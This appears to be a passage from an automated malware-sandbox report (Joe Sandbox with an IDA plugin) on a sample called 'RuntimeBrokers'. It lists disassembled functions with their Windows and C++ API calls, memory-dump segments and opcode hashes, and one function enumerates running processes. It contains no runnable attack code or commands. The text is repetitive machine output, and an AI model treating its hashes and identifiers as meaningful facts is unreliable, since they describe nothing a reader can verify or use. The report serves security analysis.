                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Cnd_initstd::_$C_error@std@@Throw_$H_prolog3Mtx_lockMtx_unlock
                                        • String ID:
                                        • API String ID: 3974313008-0
                                        • Opcode ID: c616ea58e25b5b7e6706fb52d0f4661f5f49bb522929b91b7698d21acddeca5a
                                        • Instruction ID: bf8a16e152883bd7db3a76fa19931baa3a84bf571b91c76f835d8da0afe16401
                                        • Opcode Fuzzy Hash: c616ea58e25b5b7e6706fb52d0f4661f5f49bb522929b91b7698d21acddeca5a
                                        • Instruction Fuzzy Hash: C921A130A0635ADADF04CBA8C4457EEB7B46F0531CF205149D419BBAC0CB789B09CB66
                                        Function 6C15AD81 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15AD88
                                        • GetCommandLineW.KERNEL32(00000040,6C15ABF9,?,?,?,?,?,?,?,?,00000070), ref: 6C15ADB4
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000000,?,?,?,?,?,?,00000070), ref: 6C15ADD7
                                          • Part of subcall function 6C14B57E: __EH_prolog3_GS.LIBCMT ref: 6C14B585
                                        • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,?,?), ref: 6C15AE11
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@$?extract_op_from_cmd@?u16to8@common@ierd_tgp@@CommandD@2@@4@@D@2@@std@@0LineSys_wrapper@common@ierd_tgp@@U?$char_traits@_V45@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                                        • String ID:
                                        • API String ID: 1848217688-0
                                        • Opcode ID: 9aeb13419082e1af3b5fa886f5159aa0bafac3fadf07d6e6486054ce80ef38fd
                                        • Instruction ID: 058d3b9ec7654b6ee7c1db0d1a46b7860158f53c2b37decf0de2b7f1de1cd7d8
                                        • Opcode Fuzzy Hash: 9aeb13419082e1af3b5fa886f5159aa0bafac3fadf07d6e6486054ce80ef38fd
                                        • Instruction Fuzzy Hash: A6218CB2D41249DFCF10DFE884806EEFFB4AF2A214F64012AD024B7780D7349A4ACB60
                                        Function 6C0DA497 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • _Query_perf_frequency.MSVCP140(B33B76E5,6C438898,?,00000000,?,?,?,6C31C7DC,000000FF,?,6C0E0A54,?,?,?,?,6C0E0386), ref: 6C0DA4BE
                                        • _Query_perf_counter.MSVCP140(B33B76E5,6C438898,?,00000000,?,?,?,6C31C7DC,000000FF,?,6C0E0A54,?,?,?,?,6C0E0386), ref: 6C0DA4CA
                                        • __alldvrm.LIBCMT ref: 6C0DA4D4
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C0DA4F5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Query_perf_counterQuery_perf_frequencyUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 3135650852-0
                                        • Opcode ID: 67a232ea8eab9820ac430ed8027c40d93d60bfe41fc30855aae8abcfd115f101
                                        • Instruction ID: ff0342ad221bd8ad7f2c2fa38b47785aeaf4cc611cf6ed24cbe0924a1f460c12
                                        • Opcode Fuzzy Hash: 67a232ea8eab9820ac430ed8027c40d93d60bfe41fc30855aae8abcfd115f101
                                        • Instruction Fuzzy Hash: B2018EB2A042087FD714CB69CC44FFBBBBCEB94A58F114529B519E7740D778AC008675
                                        Function 6C13A08A Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C13A091
                                        • _Mtx_init_in_situ.MSVCP140(?,00000002,00000008,6C132169,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C13A0BF
                                        • _Mtx_init_in_situ.MSVCP140(?,00000002,?,00000002,00000008,6C132169,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C13A0D1
                                        • _Mtx_init_in_situ.MSVCP140(?,00000002,?,00000002,?,00000002,00000008,6C132169,00000008,6C132254,00000004,6C13553B,00000000,6C0FAB44), ref: 6C13A0E3
                                          • Part of subcall function 6C139EEA: __EH_prolog3.LIBCMT ref: 6C139EF1
                                          • Part of subcall function 6C139EBD: __EH_prolog3.LIBCMT ref: 6C139EC4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3Mtx_init_in_situ
                                        • String ID:
                                        • API String ID: 3035183098-0
                                        • Opcode ID: 33c7890e8ec17a4e27f383ad6ff32142dfe4dbb2a88d725b7a3422e243e0a9cc
                                        • Instruction ID: 07369277918997eef60def90fc5331ace9651d52ff5e664f4a37f17cdd9d2abf
                                        • Opcode Fuzzy Hash: 33c7890e8ec17a4e27f383ad6ff32142dfe4dbb2a88d725b7a3422e243e0a9cc
                                        • Instruction Fuzzy Hash: 9C210870905784DED720CFA8C555BDEFAF0AF15304FA0886ED19AA7781D7B46608CB62
                                        Function 6C16FD7A Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C16FD81
                                        • ?GetUpdatedFilePath@silence_update@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PB_W0@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C16FDB6
                                          • Part of subcall function 6C170259: __EH_prolog3.LIBCMT ref: 6C170260
                                          • Part of subcall function 6C170259: ?GetUpdatedFilePathEx@silence_update@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PB_W0AAK@Z.COMMON(?,?,00000000,?,00000008,6C16FDBB,?), ref: 6C17027A
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,0000003C), ref: 6C16FDEC
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,0000003C), ref: 6C16FDFF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@FileU?$char_traits@V?$allocator@V?$basic_string@$H_prolog3_PathUpdated$?u8to16@common@ierd_tgp@@Ex@silence_update@common@ierd_tgp@@ExistsH_prolog3Path@silence_update@common@ierd_tgp@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@
                                        • String ID:
                                        • API String ID: 4278220595-0
                                        • Opcode ID: 87d082156dccbb9ebaead78758ccca97119193b4623e9491eeac1f1b4ab82350
                                        • Instruction ID: c00298175d908ff0fe7803b93856f89be379de73ebd3d84f31e3e33e0e1389dc
                                        • Opcode Fuzzy Hash: 87d082156dccbb9ebaead78758ccca97119193b4623e9491eeac1f1b4ab82350
                                        • Instruction Fuzzy Hash: 5721E3B1D01248DFDF10CFE5C984ADEBBB8BF18218F64446EE409E7640D774AA49CBA1
                                        Function 6C172224 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C17222B
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,00000054), ref: 6C172278
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • ?get_tcls_path@util_version_cfg@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z.COMMON(?,?,?,?,00000054), ref: 6C172285
                                          • Part of subcall function 6C1722D5: __EH_prolog3_GS.LIBCMT ref: 6C1722DC
                                          • Part of subcall function 6C1722D5: ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,00000000), ref: 6C172385
                                          • Part of subcall function 6C1722D5: ?file_exists@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,00000000), ref: 6C17238F
                                          • Part of subcall function 6C1722D5: ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,0000006C,6C17228A,?,?,?,?,00000054), ref: 6C17241A
                                        • ?string@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,00000054), ref: 6C1722B6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$H_prolog3_W@2@@std@@$?wstring@path@filesystem@ierd_tgp@@D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?file_exists@common@ierd_tgp@@?get_tcls_path@util_version_cfg@ierd_tgp@@?string@path@filesystem@ierd_tgp@@?u8to16@common@ierd_tgp@@V34@@W@2@@4@@W@2@@std@@@
                                        • String ID:
                                        • API String ID: 2979718539-0
                                        • Opcode ID: ab2abb536d6b550baf44334f461810b4edfc700ddfe606c945e317cb4157a056
                                        • Instruction ID: a67c8383926817f53bf7579cbc8fbfefbb54fc4653c315e28769f29963f36794
                                        • Opcode Fuzzy Hash: ab2abb536d6b550baf44334f461810b4edfc700ddfe606c945e317cb4157a056
                                        • Instruction Fuzzy Hash: BD2117B1C01248DBDF04DFE9C944ADDFBF8AF68304F54415AD105BB6A0D7B49A49CBA1
                                        Function 6C177F2B Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C177F32
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,00000040), ref: 6C177F74
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • ?GetXMLDataStr@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@PBEI00@Z.COMMON(?,?,?,00000007,?,?,?,?,?,?,?,?,?,00000040), ref: 6C177F87
                                          • Part of subcall function 6C177FD5: __EH_prolog3_GS.LIBCMT ref: 6C177FDF
                                          • Part of subcall function 6C177FD5: ?is_regular_file@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?), ref: 6C17800D
                                          • Part of subcall function 6C177FD5: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 6C178041
                                          • Part of subcall function 6C177FD5: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C178048
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,00000007,?,?,?,?), ref: 6C177FAD
                                          • Part of subcall function 6C14B57E: __EH_prolog3_GS.LIBCMT ref: 6C14B585
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$H_prolog3_$D@std@@U?$char_traits@V?$allocator@V?$basic_string@W@2@@std@@$?u16to8@common@ierd_tgp@@D@2@@4@@$?get_log_instance@base@@?is_regular_file@common@ierd_tgp@@?u8to16@common@ierd_tgp@@D@2@@std@@DataI00@Logger@1@Str@common@ierd_tgp@@V34@W@2@@4@@W@2@@std@@@
                                        • String ID:
                                        • API String ID: 2393786824-0
                                        • Opcode ID: f021d0e56856f5b2a72f2a03a008a3c0314645c5c2f364f17e68a54ff89e3f03
                                        • Instruction ID: 6c7c3e4fbd5fa9ee222211a6a6a21eb7efb257934a2bf57f8e14a6c8fef63ed9
                                        • Opcode Fuzzy Hash: f021d0e56856f5b2a72f2a03a008a3c0314645c5c2f364f17e68a54ff89e3f03
                                        • Instruction Fuzzy Hash: 1B21D3B0D05249DBDF14CFA4C984BDEBBB8AF18318F544059E904B7340D779AA49CBA6
                                        Function 6C0FBFA4 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FBFAE
                                        • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?), ref: 6C0FBFDE
                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,00000104,?), ref: 6C0FC00F
                                        • GetLastError.KERNEL32 ref: 6C0FC019
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ErrorH_prolog3_LastPrivateProfileString_waccess
                                        • String ID:
                                        • API String ID: 1080501792-0
                                        • Opcode ID: 06b22112f9ece6d58f8cacb2324304c1b0db395dac35ca3213b239311522565c
                                        • Instruction ID: e0113230da19d9d7e17cdf92c5542d9e3ea1eb7d6735b58b63cb22ebbaeb947c
                                        • Opcode Fuzzy Hash: 06b22112f9ece6d58f8cacb2324304c1b0db395dac35ca3213b239311522565c
                                        • Instruction Fuzzy Hash: 10118071A44218ABDF20EF64CC8DBDE77F8AF18724F100189F918A7690D7759E868F94
                                        Function 0041E083 Relevance: 6.0, APIs: 4, Instructions: 47processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041E0A7
                                        • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0041E0E8
                                        • Process32NextW.KERNEL32(000000FF,0000022C), ref: 0041E112
                                        • CloseHandle.KERNEL32(000000FF,?,00000002,00000000), ref: 0041E121
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 6e4711fdf79ae2e1c758e171575a3c299cc120a004d659e44b9d67d60d9484d6
                                        • Instruction ID: 844813e5710c93d5d34fdd77770579c633f32a7c6eb4074af075c9fcb332e334
                                        • Opcode Fuzzy Hash: 6e4711fdf79ae2e1c758e171575a3c299cc120a004d659e44b9d67d60d9484d6
                                        • Instruction Fuzzy Hash: 01113030900228AADB20EB65DD8EBDDBBB4AF14314F1001E9B419AA191DB7C5FC5CF14
                                        Function 6C0DBEFE Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DBF03
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DBF27
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DBF48
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DBF5E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 2505503336-0
                                        • Opcode ID: 583e8c3d4cf845caef7a4bc2bc8fa1e84ea624be13c6d1aced10f863d218fb8e
                                        • Instruction ID: 21db4289d2e8e65c42d85ffce8fc1d79044f60eaec5062e76f8fa384345bba0a
                                        • Opcode Fuzzy Hash: 583e8c3d4cf845caef7a4bc2bc8fa1e84ea624be13c6d1aced10f863d218fb8e
                                        • Instruction Fuzzy Hash: 20014C753007218FC7209F79C0D862977F6EF8A709B514569E80687B60DB70B802CF22
                                        Function 6C0C7C85 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0C7C8F
                                          • Part of subcall function 6C0C51EA: __EH_prolog3.LIBCMT ref: 6C0C51F1
                                          • Part of subcall function 6C0C51EA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C5215
                                          • Part of subcall function 6C0C51EA: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C522E
                                          • Part of subcall function 6C0C4891: __EH_prolog3.LIBCMT ref: 6C0C4898
                                          • Part of subcall function 6C0C4891: ?flags@ios_base@std@@QBEHXZ.MSVCP140(00000028,6C0C7CB8,?,?,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C48AC
                                          • Part of subcall function 6C0C4891: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,?,?,?,?,?,00000004), ref: 6C0C48ED
                                          • Part of subcall function 6C0C4891: ?flags@ios_base@std@@QBEHXZ.MSVCP140(?,?,?,?,00000004), ref: 6C0C4900
                                          • Part of subcall function 6C0C4891: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAVios_base@1@AAV21@@Z@Z.MSVCP140(6C0B0520,?,?,?,?,00000004), ref: 6C0C4954
                                          • Part of subcall function 6C0C4891: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAVios_base@1@AAV21@@Z@Z.MSVCP140(6C0C7A68,?,?,?,?,00000004), ref: 6C0C4961
                                          • Part of subcall function 6C0C4891: ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(00000030,?,?,?,?,00000004), ref: 6C0C4972
                                          • Part of subcall function 6C0C4891: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000002,00000000,?,?,?,?,00000004), ref: 6C0C499E
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000,?,?,?,?,00000004), ref: 6C0C7CC3
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,?,00000004), ref: 6C0C7D02
                                          • Part of subcall function 6C0C46DC: __EH_prolog3_catch.LIBCMT ref: 6C0C46E3
                                          • Part of subcall function 6C0C46DC: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,?,00000000,0000004C,6C0C7CDC,?,?,?,?,?,?,00000004), ref: 6C0C4716
                                          • Part of subcall function 6C0C46DC: ?width@ios_base@std@@QBE_JXZ.MSVCP140(00000000,?,?,?,?,00000004), ref: 6C0C4749
                                          • Part of subcall function 6C0C46DC: ?width@ios_base@std@@QBE_JXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 6C0C477D
                                          • Part of subcall function 6C0C46DC: ?width@ios_base@std@@QBE_JXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 6C0C4793
                                          • Part of subcall function 6C0C46DC: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 6C0C47CB
                                          • Part of subcall function 6C0C46DC: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,?,00000000,0000004C,6C0C7CDC,?,?,?,?,?,?,00000004), ref: 6C0C4852
